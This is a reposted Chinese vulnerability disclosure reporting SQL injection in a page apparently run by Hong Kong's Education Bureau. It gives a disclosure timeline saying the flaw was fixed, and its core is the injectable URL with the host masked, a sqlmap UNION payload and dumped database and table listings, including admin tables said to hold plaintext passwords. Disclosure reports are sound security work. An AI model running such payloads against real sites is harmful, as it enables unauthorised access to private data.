神刀安全网

漏洞标题: 香港教育局存在SQL注入(香港地區)

漏洞详情

披露状态:

2016-02-16: 细节已通知厂商并且等待厂商处理中
2016-02-17: 厂商已经确认,细节仅向厂商公开
2016-02-27: 细节向核心白帽子及相关领域专家公开
2016-03-08: 细节向普通白帽子公开
2016-03-18: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

RT,建站15年,但是比较明显得存在SQL注入,水表已拆…

详细说明:

注入点:

code 区域
https://**.**.**.**/hkfile.php?m=1&oid=5&tid=205 (GET)

sqlmap得:

code 区域
sqlmap identified the following injection points with a total of 26 HTTP(s) requ
ests:
---
Parameter: tid (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: m=1&oid=5&tid=-5808 UNION ALL SELECT CONCAT(0x7176717a71,0x4b4d6843
767a4c775559,0x716b786b71)--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0

漏洞证明:

注入数据可得:

code 区域
available databases [3]:
[*] gifted3
[*] information_schema
[*] test

Database: gifted3
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| htx_event_item | 554 |
| htx_event_item_photo | 320 |
| web_item_file | 285 |
| htx_event_item_news | 134 |
| web_item_two | 118 |
| web_item_article | 96 |
| web_item_one | 50 |
| web_item_news | 41 |
| web_links | 39 |
| htx_organizer | 28 |
| htx_event_item_file | 21 |
| web_item_three | 21 |
| web_template | 20 |
| htx_events | 19 |
| htx_admin | 11 |
| web_news | 11 |
| htx_events_category | 8 |
| web_menu | 8 |
| htx_event_item_gallery_photo | 6 |
| web_links_class | 6 |
| htx_event_item_gallery | 5 |
| web_item_four | 5 |
| web_admin | 3 |
| web_info | 3 |
| htx_links | 1 |
| web_webset | 1 |
+------------------------------+---------+

密码等明文存储,就不深入了…

修复方案:

过滤参数

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 香港教育局存在SQL注入(香港地區)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址